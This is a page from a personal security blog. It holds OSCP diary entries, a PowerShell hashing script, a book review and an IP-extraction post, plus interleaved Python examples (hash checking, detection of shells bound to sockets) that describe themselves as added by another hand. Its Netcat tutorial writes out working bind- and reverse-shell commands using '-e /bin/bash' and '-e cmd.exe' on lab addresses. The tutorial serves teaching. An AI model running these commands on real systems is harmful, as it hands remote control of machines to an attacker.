All posts by Thomas

My name is Thomas. Thanks for taking the time to visit my little corner of the internet! Hopefully you find my posts informative or interesting. I am a Computer Networking Honours Student and an IT Guy, and I have created this blog as a way for me to release my inner geekery and document my journey in the world of Networking.

OSCP Diary Day 2 and 3

I’m now on day 3 of 90 of the OSCP. How has progress been!?…well, steady.

Time has been tight, with work, family etc. It’s hard to set aside blocks of time to really sit down and concentrate. I have the luxury of being able to do a bit at work (cause my work is awesome!), but much of that is broken up in between work stuff (which obviously takes priority) so I haven’t had a huge amount of time to just sit down and focus on working through the course work.

But steady progress is better than no progress… and today…*druuum roooollllll* I popped my first box. Although it was very…VERY low hanging fruit.

I have also made some great progress in regards to enumeration. So all in all, the last couple of days while not being perfect have been okay.

I will need to take a day off tomorrow as I am attending a Cyber Security Conference (which I am really pumped up for), but I will be back in action on Friday.
I’ve still not had that “I can’t do this” moment…but I haven’t tried hard enough yet. Friday I hope to have a few hours of time to dedicate to this, so maybe that moment will come then!

Meaningful time in labs: 9 hours.

OSCP Diary Day 1

Welcome to my OSCP diary, somewhere for me to brain dump my thoughts as I work my way through the Penetration Testing with Kali Linux (PWK) course and then take the Offensive Security Certified Professional (OSCP) Exam.

The PWK/OSCP are under strict NDA so I will not be going into details here, I will be very general and very vague. So if you are looking for PWK tutorials and howtos, then you have come to the wrong place.

After weeks of waiting I finally got my OSCP lab access last night at 0000 Hours, as the bell tolled midnight the email that I had not patiently waited for was finally delivered.

The plan was wait up until midnight, get the email download all the stuff that I needed to get onto the labs, all the course materials etc. etc. then go to bed get a solid 7 hours sleep and be ready to spend Sunday pwning n00bs and popping shells!

So that was the plan, the reality however was somewhat more chaotic. Like a schoolboy at Christmas I have been getting a little hyped up over the last few days counting down the minutes to 0000 on my lab access day, thus I was already a little sleep deprived when I waited up to receive my email.

So the email comes in and I feel the rush of adrenalin surge through me (well, about as much of a rush as you can get from receiving an email after a 20 hour day), and off I go dutifully downloading all the stuff I needed.

So I finished getting all the stuff and headed off to bed and sleep for a solid 7 hours….no I’m just kidding. I thought to myself, “ahh well I may as well configure everything just now so I’m ready to go in the morning.”, so off I go configuring all the things, getting everything just so.

It is now around 0100 everything is downloaded, everything is configured, all I need to do now is get some shut eye.

“But maybe I should just have a wee tincy wincy look at what I have in store for me”….so I open the course materials, pop on the forums, check out the IRC…it’s now 0200.

My mindset has now changed, I’m now thinking “well I’ve gone this far I may as well get on the labs and have a look”…3 hours later it’s 0500 and I’ve just sat up all night, excitedly scanning all the things!
At this stage tiredness gets the better of me and I decide to call it a night (well, technically morning).

So to bed I go. 3 and a bit hours later I’m awake again, it is now 0830 and I am feeling compelled to get back in the labs. So to the labs I go…now it may be the sleep deprivation, it may be the excessive amount of espressos I’ve consumed or it could be a combination of both, but I could not focus on any one thing. I must have wasted hours jumping around from one thing to another. I went from going rogue and jumping ahead of the game hitting random boxes to deciding to slow down and methodically just work my way through things from beginning to end.

In the end it is now approaching 1800, I need to get things ready for the day job tomorrow (who I owe a big thank you to for putting me through the OSCP!), and I need to step away for a bit and let everything from the last 18 hours sink in.

The two take aways from day 1 are:

1: Sleep (it is a requirement unfortunately)
2: Plan ahead and prepare your day. (this will save a lot of time later on!)

Now roll on day 2 (of 90).

Meaningful time in labs: 6 Hours

Get MD5 and SHA1 digests in Windows 7

Hi, my name is Thomas and I am a Linux user. But I am not a fanboy! Hard to believe I know, but to me an OS is just a big tool that allows me to use other tools, so whether it is Linux, Windows or Mac I really don’t mind as long as it is up to the job I want it for.

I recently had to use a Windows 7 machine, so as usual I started by prepping it for what I wanted to use it for. One of my first tasks was installing a hypervisor so I could spin up some VMs, Linux VMs cause how am I expected to get anything done on Windows 7!!!1!??

Anyway, as part of this download/install ritual, being a good security analyst I wanted to verify the integrity of what I was downloading by checking the hash digests. Upon investigation I realised that Windows 7 (not fit for purpose!) does not support this natively.

Looking into this further I found this blog post about the Get-FileHash cmdlet in PowerShell. Excellent, I thought, this is just what I need.

Except…it wouldn’t work, I’m not sure why, I’m guessing it was only included in newer versions of PowerShell than the one I was using…all I know is that it would not work.

So off to PowerShell hacking and bodging I went! What I came up with was this script: ugly and in need of improvement, but ultimately up to the job. (I just hope not clearing those variables during a running instance does not come back to haunt me!)

###############
# nettx.co.uk #
###############

# Runs on the stock Windows PowerShell 2.0 that ships with Windows 7, where the
# Get-FileHash cmdlet (added in PowerShell 4.0) is not available, by calling the
# .NET crypto providers directly.
#
# Error handling (missing file / empty input) and clearing of variables after
# the run are done below; the earlier TODOs for both are therefore closed.

function Show-Menu
{
     param (
           [string]$Title = @'
 _______          __ ___________       
 \      \   _____/  |\__    ___/__  ___
 /   |   \_/ __ \   __\|    |  \  \/  /
/    |    \  ___/|  |  |    |   >    < 
\____|__  /\___  >__|  |____|  /__/\_ \
        \/     \/                    \/ 
       Get hash digest tool
             thomas
'@
     )

     Clear-Host
     Write-Host $Title
     Write-Host "Press '1' to get MD5"
     Write-Host "Press '2' to get SHA1"
     Write-Host "Press '3' to get both"
     Write-Host "Or double tap ENTER to exit..."
}

# Compute the digest of a file with the named .NET provider ('MD5' or 'SHA1')
# and return it as an upper-case hex string without the dashes that
# [BitConverter]::ToString inserts between bytes.
function Get-FileDigest
{
     param (
           [string]$Path,
           [string]$Algorithm
     )

     # Resolve relative paths against the PowerShell location; .NET would use
     # the process working directory, which is not always the same thing.
     $fullPath = (Resolve-Path -Path $Path).Path
     $provider = New-Object -TypeName "System.Security.Cryptography.${Algorithm}CryptoServiceProvider"
     $bytes = [System.IO.File]::ReadAllBytes($fullPath)
     $digest = [System.BitConverter]::ToString($provider.ComputeHash($bytes)) -replace '[-]', ''
     $provider.Clear()
     return $digest
}

# Keep asking until an existing file is given, instead of letting ReadAllBytes
# throw on a typo or an empty line.
function Read-FilePath
{
     while ($true) {
          $File = Read-Host "Enter the full path of the file to be hashed"
          if ($File -and (Test-Path -Path $File -PathType Leaf)) { return $File }
          Write-Host "File not found: $File"
     }
}

do
{
     Show-Menu
     # $input is an automatic variable in PowerShell, so the choice gets its own name.
     $selection = Read-Host "Please make a selection"
     switch ($selection)
     {
           '1' {
                $File = Read-FilePath
                Write-Host ""
                Write-Host (Get-FileDigest -Path $File -Algorithm 'MD5')
                Write-Host ""
                Read-Host "Press ENTER to continue..."
           }
           '2' {
                $File = Read-FilePath
                Write-Host ""
                Write-Host (Get-FileDigest -Path $File -Algorithm 'SHA1')
                Write-Host ""
                Read-Host "Press ENTER to continue..."
           }
           '3' {
                $File = Read-FilePath
                Write-Host ""
                Write-Host "MD5: " (Get-FileDigest -Path $File -Algorithm 'MD5')
                Write-Host "SHA1:" (Get-FileDigest -Path $File -Algorithm 'SHA1')
                Write-Host ""
                Read-Host "Press ENTER to continue..."
           }
           'q' {
                return
           }
     }
}
until ($selection -eq '')

# Clear the variables that held the path and the menu choice once we are done.
Remove-Variable -Name File, selection -ErrorAction SilentlyContinue
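The script above prints a digest for you to eyeball against the one on the download page. Checking a whole download against a published manifest is the same idea carried through: read the file in chunks, compare against the expected digest, and report per file. The example below is an added one (mine, not the post's script and not related to it) and assumes the manifest is in the layout written by md5sum, sha1sum and sha256sum (`<hex>  <filename>`, with an optional `*` for binary mode), which is what most projects publish. The sample manifest and files are constructed for the demo; the two "OK" entries use the standard MD5 and SHA-1 test vectors for the string "abc". One caveat a practitioner should keep in mind: MD5 and SHA-1 are fine for spotting a corrupted download, but both are collision-broken, so a manifest offering SHA-256 is the one to use when the concern is a deliberately swapped file, and a digest served from the same page as the download only proves the two were published together.

```python
import hashlib
import hmac
import os
import tempfile

# Hex digest length identifies the tool that wrote the manifest line:
# md5sum -> 32 chars, sha1sum -> 40, sha256sum -> 64.
HEX_LEN_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}


def file_digest(path, algo, chunk_size=1024 * 1024):
    """Hash a file in chunks so a multi-GB ISO never has to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse coreutils-style '<hex>  <name>' lines into (name, algo, digest) tuples.

    A leading '*' on the name (binary mode) is dropped, digests are lower-cased,
    and anything that is not a recognisable digest line raises ValueError."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError("unrecognised manifest line: %r" % line)
        digest, name = parts[0].lower(), parts[1].lstrip("*").strip()
        algo = HEX_LEN_TO_ALGO.get(len(digest))
        if algo is None or not all(c in "0123456789abcdef" for c in digest) or not name:
            raise ValueError("unrecognised manifest line: %r" % line)
        entries.append((name, algo, digest))
    return entries


def verify(directory, manifest_text):
    """Return {filename: 'OK' | 'MISMATCH' | 'MISSING'} for every manifest entry."""
    results = {}
    for name, algo, expected in parse_manifest(manifest_text):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
            continue
        actual = file_digest(path, algo)
        # compare_digest is habit more than necessity for a local check, but it
        # costs nothing and never short-circuits on the first differing byte.
        results[name] = "OK" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return results


# Constructed manifest: two correct entries (MD5 and SHA-1 of b"abc"), one whose
# file has been altered, and one whose file was never downloaded. Filenames are
# made up for the demo.
SAMPLE_MANIFEST = """\
900150983cd24fb0d6963f7d28e17f72  kali-installer.iso
a9993e364706816aba3e25717850c26c9cd0d89d *vbox-setup.exe
BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD  tampered.bin
da39a3ee5e6b4b0d3255bfef95601890afd80709  not-downloaded.zip
"""


def run_demo():
    """Write the constructed files into a temp folder and verify them against the manifest."""
    with tempfile.TemporaryDirectory() as d:
        for name, content in (("kali-installer.iso", b"abc"),
                              ("vbox-setup.exe", b"abc"),
                              ("tampered.bin", b"abd")):
            with open(os.path.join(d, name), "wb") as f:
                f.write(content)
        return verify(d, SAMPLE_MANIFEST)


if __name__ == "__main__":
    for name, status in run_demo().items():
        print("%-22s %s" % (name, status))
```

Because the algorithm is inferred from the digest length, the same function handles a manifest from any of the three coreutils tools without a flag, which is handy when you are checking downloads from several projects in one go.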

What are Bind and Reverse Shells?

I wanted to make a very short and simple post about shells…when starting out in pen testing you will hear a lot of chatter about shells, so this post hopes to clear up some of the terminology involved.

Now I guess that since you are reading this you’re already familiar with what a shell is. *If not, have a look here.* What I wanted to cover was bind shells and reverse shells…and what exactly the differences are. To do this we are going to run through a short exercise using the classic Netcat.

What you will need for this exercise are two machines on the same network segment, both with a copy of Netcat on them. They can be any combination of Linux or Windows (or something more exotic and/or $expensive = Macs).

For this exercise I spun up a couple of VMs, one Kali Linux box and one Windows Server 2012 box.

Netcat is included on Linux distros that come with Nmap as standard, or can be downloaded from most standard Linux repos; for Windows you can pull nc.exe from the web.

Netcat is a simple (but powerful) command line tool that has become something of a legend in the networking and security worlds. Put simply, Netcat can throw up listening TCP and UDP ports very quickly, and, unsurprisingly enough, it can also connect to TCP and UDP ports just as easily.

Netcat comes into its own however with its power to read and write bytes to and from these connections, and this allows Netcat to perform a vast array of functions. For more have a look at the Netcat man page.

It is Netcat’s ability to read and write to layer 4 connections and streams that allows us to create the shells. This is done by redirecting the 3 shell I/O streams, stdin, stdout and stderr over the layer 4 connections.

The nuances of what is a bind shell and what is a reverse shell are dictated by the client server paradigm.

Okay, demo time, so either play along at home or just put your feet up and watch. *Read*

Our two boxes are Wendy the Windows box (192.168.1.80) and Lynn the Linux box (192.168.1.78).

So we will start with a bind shell, this is really quite simple, a bind shell is called a bind shell because it binds a shell to a listening TCP port. For example;

Lynn the Linux box wants to bind its bash shell to a listening port; the following command can be used to do this:

Lynn: nc -nlvp 9874 -e /bin/bash

Let’s break that command down: nc is the Netcat binary; -nlvp is numeric (no DNS lookups), listen, verbose and port, with 9874 as the option, this being the port that will be set to listen. The -e points to a file to be executed after the connection is established, in this instance that file is /bin/bash, our shell. Note that -e only exists in Netcat builds compiled with it (the traditional netcat’s GAPING_SECURITY_HOLE option) and in Nmap’s Ncat; the OpenBSD-derived netcat that some distros install as nc does not have it.

Now when a connection is established on Lynn (192.168.1.78:9874), the bash shell will fire up and proceed to redirect its I/O streams across the connection. So if we connect to it from another box we can access Lynn’s shell; let’s do this from Wendy:

Wendy nc -nv 192.168.1.78 9874

And that’s it…it’s that simple, we now have control over an instance of bash running on Lynn from Wendy. From Wendy we can issue commands and see the output of them.

[Screenshot: bind_shell]

The reason this is known as a bind shell is because the shell is bound to the listening port, but what if we want to access Wendy’s Shell from Lynn while still maintaining the same Client/Server paradigm?

Well thankfully this is just as easy, what we are about to do is known as a reverse shell. First, as before we will set up a listening TCP port on Lynn, this time however we are not going to bind a shell to the listening port.

Lynn: nc -nlvp 9874

Now on Wendy we are going to connect to Lynn’s listening port of 9874, this time however we are going to attach Wendy’s cmd.exe shell to the client end of the conversation.

Wendy nc -nv 192.168.1.78 9874 -e cmd.exe

We now have access to Wendy’s shell on Lynn. There are a number of different reasons why we might choose between bind and reverse shells; the main one as far as pen testing goes is basic evasion: connections could be allowed in one direction but denied in the other. If Wendy and Lynn were on two separate network segments with a firewall in the middle, for example, the firewall may allow outbound connections but deny inbound ones, so a listener on Wendy would be unreachable while a connection out from Wendy would go through.

In the example above Lynn acted as the server and Wendy as the client, but this paradigm can be reversed with the exact same results for both bind and reverse shells, simply by setting Wendy to listen instead of Lynn.
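The definition given above, a shell whose stdin, stdout and stderr have been redirected over a layer 4 connection, is also exactly what a defender looks for on the box. The following is an added example (mine, not from the post) of that check: on Linux the entries under /proc/<pid>/fd are symlinks that read socket:[inode] when a descriptor is a socket, so a shell process whose descriptors 0, 1 and 2 all point at an established TCP socket is a shell bound to a connection, whichever side listened. Whether it was a bind or a reverse shell is inferred from the connection: if the shell host’s local port is a listener (or a low, non-ephemeral port) the remote side connected in, otherwise the shell host connected out; that rule and the 32768 ephemeral floor are heuristics assumed here, not something the post states. The process and connection snapshots are constructed to mirror the post’s lab addresses (Lynn 192.168.1.78, Wendy 192.168.1.80); the live collector at the bottom is only for Linux and is not used by the demo.

```python
import os
import re
from collections import namedtuple

# Shells whose standard streams are normally a tty or a pipe, never a socket.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "ash", "cmd.exe", "powershell.exe"}
# Assumed floor of the ephemeral port range (Linux default is 32768, Windows 49152).
EPHEMERAL_FLOOR = 32768

Finding = namedtuple("Finding", "pid comm kind local peer streams")


def socket_inode(target):
    """'socket:[12345]' -> 12345; any other /proc/<pid>/fd link target -> None."""
    m = re.fullmatch(r"socket:\[(\d+)\]", target)
    return int(m.group(1)) if m else None


def find_socket_shells(processes, connections, listening_ports):
    """Flag every shell whose stdin/stdout/stderr is an established TCP socket.

    processes:       iterable of (pid, comm, {fd: link_target}) as read from /proc
    connections:     {socket_inode: (local_addr, peer_addr)} for ESTABLISHED sockets,
                     i.e. what 'ss -tnpe' or /proc/net/tcp gives you
    listening_ports: set of local ports currently in LISTEN state
    """
    findings = []
    for pid, comm, fds in processes:
        if comm not in SHELL_NAMES:
            continue
        bound = {}
        for fd in (0, 1, 2):
            ino = socket_inode(fds.get(fd, ""))
            if ino is not None and ino in connections:
                bound[fd] = ino
        if not bound:
            continue
        local, peer = connections[next(iter(bound.values()))]
        local_port = int(local.rsplit(":", 1)[1])
        # Bind shell: this host was the listener, so its end of the connection sits on
        # the listening (non-ephemeral) port. Reverse shell: this host connected out,
        # so its end is an ephemeral port and the listener is on the peer.
        if local_port in listening_ports or local_port < EPHEMERAL_FLOOR:
            kind = "bind"
        else:
            kind = "reverse"
        findings.append(Finding(pid, comm, kind, local, peer, sorted(bound)))
    return findings


def snapshot_linux_processes():
    """Live collector for the 'processes' argument (Linux only; reading another user's
    /proc/<pid>/fd needs root). Not used by the constructed demo."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/comm" % pid) as f:
                comm = f.read().strip()
            fds = {int(fd): os.readlink("/proc/%s/fd/%s" % (pid, fd))
                   for fd in os.listdir("/proc/%s/fd" % pid)}
        except OSError:
            continue
        procs.append((int(pid), comm, fds))
    return procs


# Constructed snapshot taken on Lynn: an ordinary interactive bash, the bash behind
# 'nc -nlvp 9874 -e /bin/bash' with Wendy connected, a bash whose streams go out to a
# listener on Wendy, and sshd, which holds a socket on fd 3 and is not a shell.
SAMPLE_PROCESSES = [
    (1201, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    (1337, "bash", {0: "socket:[40001]", 1: "socket:[40001]", 2: "socket:[40001]"}),
    (1400, "bash", {0: "socket:[40002]", 1: "socket:[40002]", 2: "socket:[40002]"}),
    (1500, "sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null", 3: "socket:[40003]"}),
]
SAMPLE_CONNECTIONS = {
    40001: ("192.168.1.78:9874", "192.168.1.80:50122"),
    40002: ("192.168.1.78:51044", "192.168.1.80:4444"),
    40003: ("192.168.1.78:22", "192.168.1.80:50200"),
}
SAMPLE_LISTENING = {22, 9874}


if __name__ == "__main__":
    for f in find_socket_shells(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS, SAMPLE_LISTENING):
        print("pid %d %s: %s shell %s <-> %s on fds %s"
              % (f.pid, f.comm, f.kind, f.local, f.peer, f.streams))
```

The check keys on the standard streams rather than on "process has a socket", which is why sshd is ignored: plenty of legitimate programs hold sockets on higher descriptors, but a shell reading its commands from one is the signature the post describes.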

Answering the question, no one asked…

I have to be honest I do love myself a pocket reference guide. Even with the internet’s vast resources there is something about holding an old school, analogue, physical copy of a book that is pleasing in a way that searching the internet just isn’t.

The strange thing is that despite their name, I’ve never actually carried one of these books around in my pocket, which led me to assume that they didn’t fit in real pockets….

Well as it turns out, predictably and obviously I was wrong….

Also…

Book Review: Hacked Again

Scott N. Schober’s Hacked Again has emblazoned across its cover ‘It can happen to anyone, even a cybersecurity expert.’ And so it begins, Scott is a cybersecurity expert and CEO of a hi-tech firm, in Hacked Again he takes us through his journey of being the victim of cyber crime, while along the way providing a plethora of expert and common sense advice on how to avoid finding yourself at the wrong end of cyber fraudsters.

Scott opens the book with an anecdote from his youth, opening his first bank account in a friendly local bank where people were on a first name basis, he describes the evolution of this bank and how through a series of mergers, acquisitions and takeovers it has become a modern day banking machine, impersonal and globalised. As the anecdote goes on Scott subtly drops little hints that will become relevant later.

This leads the reader seamlessly into how Scott first realised he had been hacked for the first time. One morning Scott noticed he had a number of suspicious transactions on his business account, after a little investigating it dawned on him…his account had been compromised. And so the motto on the cover proves true…‘It can happen to anyone, even a cybersecurity expert.’

As Scott looks into the compromise it begins to dawn on him, that perhaps it’s not a case of ‘it can happen to anyone even a cyber security expert’ and more a case of, ‘it can happen to anyone, especially a cybersecurity expert.’ While his business account was being investigated, Scott switched to his personal account, only to realise that was also being targeted. It was then Scott began to suspect he was being specifically targeted, that his bank credentials had been compromised and were being traded on the dark web by criminals who wanted to make an example out of the cyber security experts that make their life harder.

From here Scott describes yet another fraud his company was nearly the victim of. After receiving an order for high priced items to be sent by special delivery as soon as possible to an address in Indonesia, Scott’s company dispatched the items, only to receive a call from an angry lawn mower repair company demanding to know why he had been charged for the aforementioned items that were currently winging their way to Southeast Asia.

Thanks to the timely phone call, Scott was able to put a halt to the order and recover the items. The lessons Scott learned? Well, amongst other things, timely incident response is critical and if something seems too good to be true…it usually is.

Hacked Again then goes on to detail other cyber crimes involving identity theft, credit card fraud, social engineering as well as the tactics deployed by the attackers and the strategies to protect yourself from them. There are many themes that emerge as the book goes on such as who to trust, how to trust, defence in depth, password hygiene, internet browsing habits and the jarring reality of the divergence of feeling secure and actually being secure.

This book takes the reader on a whirlwind tour of all manner of cyber crime; it covers malware from spyware to ransomware. Scott provides advice on how to avoid being compromised via spear phishing emails that have gone from being very easy to spot with their broken English and low-res pictures to very convincing emails that look and feel the part. One of the golden nuggets buried in Hacked Again is that it not only tells you how to avoid being compromised but what to do if and when you are compromised.

The book continues to follow this blend of storytelling that is part anecdote, part ‘how to’ and part ‘how not to’. It moves swiftly and logically from one subject to the next. It is a book that does not linger on a subject long enough for it to become boring or uninteresting. Instead the book flows and is very easy to read; I was shocked when I first sat down to read Hacked Again only to realise two hours had passed in what seemed like the blink of an eye. Much of this is due to the graceful manner in which the author moves from one subject to the next.

The question I found myself asking when reading Hacked Again was ‘who is this aimed at?’ My conclusion was that this book is a must read for C-level management and small to medium business owners, as well as ICT Managers across the world. It gives an overview of the risks businesses face in today’s connected world, while providing tangible and relatable real world examples of these risks becoming real life problems.

But they are not the only people who should read this book; anyone with any kind of online presence could benefit from reading Hacked Again, and that includes everyone from your grandparents to your computer science graduate buddies and yes, even cyber security experts. Another group who will find this book of interest, and perhaps not its obvious audience, is anyone who fancies themselves as an expert in a particular field. In the latter stages of the book Scott discusses his experience as a media go-to expert on cybersecurity; this is one part of the book I found surprisingly insightful, if not entirely relevant.

This book fits a niche. It is not a focused investigation into a specific topic like Brian Krebs’s Spam Nation, Misha Glenny’s DarkMarket or Kim Zetter’s Countdown to Zero Day, nor is it a technical tour de force like that found in a Bruce Schneier book. Hacked Again just touches on those subjects, giving the reader awareness of them as examples of the darkness that is lurking out there. What this book is, is an exquisitely written warning, but not only a warning, it is a manual on what you can do to keep yourself and your business safe, and this is where its true value lies.

Hacked Again is a veritable 101 of the risks of cybercrime and cyber security, an impeccable overview of the whos, the whats and the hows of information security, and it gives this overview without ever slipping into hyperbolic hysteria in order to get its point across.

Scott’s manner of storytelling is seamless; he starts off on a thread and leads you down a path until its conclusion, all the while dropping bread crumbs of advice and the lessons he has learned along the way. It’s an effective blend of storytelling and educating, and at no point do you ever feel condescended to by the advice being dispensed. As a security researcher myself I know how easy it is to feel patronised when receiving security advice.

In the foreword for Hacked Again, radio host Jon Leiberman describes how Scott can translate complex technical details and tech talk into understandable information. This is true; Scott does know how to effectively demystify tech talk into non-intimidating, flowing and compelling storytelling. Hacked Again is the work of a man who knows his subject and the work of a man who has learned the lessons of what can happen when you are the victim of cybercrime; it is the work of a man who wants to pass on those lessons to the reader, and this is why it is a must read.

You can find Scott on Twitter @ScottBVS as well as following the Hacked Again Twitter account at @HackedAgainBook

About Scott Schober

Buy Hacked Again from Amazon UK

Buy Hacked Again from Amazon US

Get the audiobook from Audible UK

Get the audiobook from Audible US

Infamous IP Address Resurfaces

A couple of days ago researchers over at Sucuri posted a blog post detailing some investigative work on suspicious redirects which turned out to be the result of NameCheap’s Free DNS service.

I won’t cover the detail of the blog post (go read it, it’s a great piece of work) but one of the most surprising and interesting things (to me at least) uncovered was the resurrection of an IP related to the prehistoric and infamous Conficker virus’s C2 domains.

So it just goes to show that I’m not the only person in security who likes to pay homage to the past, even if I do it in a slightly less conspicuous fashion.

IPv4 Threat Intelligence – PowerShell Script

Following on from my previous post about gathering IPv4 threat intelligence automatically with Python scripts, I thought I would follow it up with a PowerShell script I wrote that does something similar.

This script will work on Windows without the need for any extra installs, so it is perfect for users that only have access to Windows in the workplace.

It is often the case that security analysts and sys-admins need to grab bulk lists of IPv4 addresses from a data source; this data source can be logs, websites or intelligence feeds. Data sources such as these can contain lots of redundant data, such as domain names, time stamps etc. etc. In general removing this data can be done simply with a script, and this is exactly what this script does.

I have seen a few scripts kicking about that do something similar to this, but they generally contain way more lines of code than is needed (although this one does have some ASCII art of cats and dogs that really doesn’t need to be there) as well as requiring some kind of user input. This script is very tight with the code and the only user input required is dragging the input file over to the script’s directory.

This script allows you to take the data source in the form of a file and automatically convert it to a .csv of IPv4 addresses, fully de-duped and with all redundant data removed, ready to be used for whatever purpose you have in mind for it.

The script is quite raw at the moment, so you will need to make a couple of edits to tailor it to your environment. See below for the bits that you may wish to edit:

  • Put the script in your Documents folder, e.g. $home\Documents\ipv4\
  • The file you want to run the script on will need to be dumped in the same folder
  • The ipv4_* wildcard is used to detect the input file
  • Follow this guide if you want to run the PowerShell script with a simple double click of a batch script
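For anyone who wants the same job done on a box that has Python rather than PowerShell, here is an added example of the extraction step as described above (my code, not the script on GitHub and not related to it, though it follows the post’s ipv4_* input-file convention). It pulls every dotted-quad candidate out of a text file, range-checks each octet with the ipaddress module, de-dupes while keeping first-seen order, optionally drops RFC 1918, loopback and link-local addresses (a filter I added for internal logs; the post’s script does not mention one), and writes a one-column CSV. The regex uses lookarounds so that a string like 1.2.3.4.5 is rejected whole instead of yielding a bogus 1.2.3.4, which a plain word-boundary pattern would do. The feed excerpt is constructed and uses documentation address ranges.

```python
import csv
import glob
import ipaddress
import os
import re
import shutil
import tempfile

# Dotted-quad candidates. The lookarounds reject runs like 1.2.3.4.5 or 10.0.0.1.2
# outright; a \b-delimited pattern would cut a plausible address out of them.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

# Address space that is noise in a threat-intel list (assumed filter, opt-in).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def extract_ipv4(text, drop_internal=False):
    """Unique, octet-validated IPv4 addresses from text in first-seen order."""
    seen = {}  # dict keeps insertion order on Python 3.7+
    for candidate in IPV4_RE.findall(text):
        try:
            addr = ipaddress.IPv4Address(candidate)   # rejects 999.1.1.1, 256.0.0.1 ...
        except ipaddress.AddressValueError:
            continue
        if drop_internal and any(addr in net for net in INTERNAL_NETS):
            continue
        seen.setdefault(addr, None)
    return [str(a) for a in seen]


def write_csv(addresses, out):
    """One address per row under an 'ipv4' header; out is any text file object."""
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["ipv4"])
    for a in addresses:
        writer.writerow([a])


def process_directory(directory, pattern="ipv4_*", drop_internal=False):
    """Every ipv4_* file dropped in the folder becomes <name>.csv beside it.
    Returns [(csv_path, address_count), ...]."""
    written = []
    for path in sorted(glob.glob(os.path.join(directory, pattern))):
        if path.endswith(".csv"):
            continue   # skip our own output on a second run
        with open(path, encoding="utf-8", errors="replace") as f:
            addrs = extract_ipv4(f.read(), drop_internal)
        out_path = os.path.splitext(path)[0] + ".csv"
        with open(out_path, "w", encoding="utf-8") as out:
            write_csv(addrs, out)
        written.append((out_path, len(addrs)))
    return written


# Constructed feed excerpt: timestamps, domains, a duplicate, an out-of-range octet,
# a five-part number and an internal address, i.e. the "redundant data" to strip.
SAMPLE_FEED = """\
2016-07-01T10:02:33Z blocked 203.0.113.10 -> evil.example (C2)
2016-07-01T10:05:10Z blocked 198.51.100.77 agent=Mozilla/5.0
2016-07-01T10:06:01Z blocked 203.0.113.10 again
bogus 999.1.1.1 and version 1.2.3.4.5 should not appear
internal scanner 10.0.0.5 hit 192.0.2.44:443
"""


def demo_directory():
    """Write the constructed feed to a temp folder as ipv4_feed.txt, process it, and
    return (address_count, csv_rows)."""
    d = tempfile.mkdtemp()
    try:
        with open(os.path.join(d, "ipv4_feed.txt"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_FEED)
        written = process_directory(d)
        with open(written[0][0], encoding="utf-8") as f:
            rows = f.read().splitlines()
        return written[0][1], rows
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    count, rows = demo_directory()
    print("%d addresses:" % count)
    print("\n".join(rows))
```

Validating with ipaddress rather than a longer octet-range regex keeps the pattern readable and means the same code can grow to IPv6 later by swapping in ipaddress.ip_address.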

I have a script very similar to this that does the same thing, but grabs the input data from the web (similar to the python scripts, but in PowerShell), I will post this in the next few days.

Find the script here on GitHub